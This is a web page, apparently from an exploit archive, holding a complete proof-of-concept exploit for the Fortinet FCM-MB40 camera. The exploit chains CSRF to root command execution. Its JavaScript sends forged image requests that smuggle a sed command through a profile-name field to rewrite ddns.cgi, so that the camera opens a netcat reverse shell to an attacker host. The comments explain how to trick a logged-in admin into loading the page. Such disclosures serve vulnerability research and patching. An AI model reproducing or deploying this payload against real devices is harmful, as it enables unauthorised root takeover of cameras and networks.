扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 |
# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF # Date: 2019-06-19 # Exploit Author: @XORcat # Vendor Homepage: https://fortinet.com/ # Software Link: Customer Account Required # Version: v1.2.0.0 # Tested on: Linux # CVE : TBA <html> <!-- FCM-MB40 CSRF to RCE as root, by Aaron Blair (@xorcat) Full details: https://xor.cat/2019/06/19/fortinet-forticam-vulns/ Follow the following steps to demonstrate this PoC: 1. Replace IP addresses in Javascript code to repr esent your testing environment. 2. Launch a <code>netcat</code> listener on the attacker's host using <code>nc -nvlp 1337 3. Ensure the "admin" user's browser is logged in to the FCM-MB40. * Note: all modern browsers will cache Basic Authentication credentials (such as those used by the FCM-MB40) even if the FCM-MB40's administration page is closed. 4. Open the crafted HTML document using the "admin" user's browser. * Note: In an attack scenario, this step would be performed by implanting the code into a legitimate webpage that the "admin" user visits, or by tricking the "admin" user into opening a page which includes the code. 5. Note that the <code>netcat</code> listener established in step 2. has received a connection from the camera, and that it is presenting a <code>/bin/sh session as root. * Note: type <code>id</code> in the <code>netcat</code> connection to verify this. _Note: After this issue has been exploited, the state of the system will have changed, and future exploitation attempts may require modification._ --> <head> <script> const sleep = (milliseconds) => { return new Promise(resolve => setTimeout(resolve, milliseconds)) }; var sed_url = 'http://192.168.1.20/cgi-bin/camctrl_save_profile.cgi?num=9&name=a%20-e%20s/^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/%20../cgi-bin/ddns.cgi%20&save=profile'; var execute_url = 'http://192.168.1.20/cgi-bin/ddns.cgi'; var sed_img = document.createElement("img"); sed_img.src = sed_url; sleep(400).then(() => { var execute_img = document.createElement("img"); execute_img.src = execute_url; }); </script> </head> <body> <h1>Welcome to my non-malicious website.</h1> </body> </html> |
体验盒子
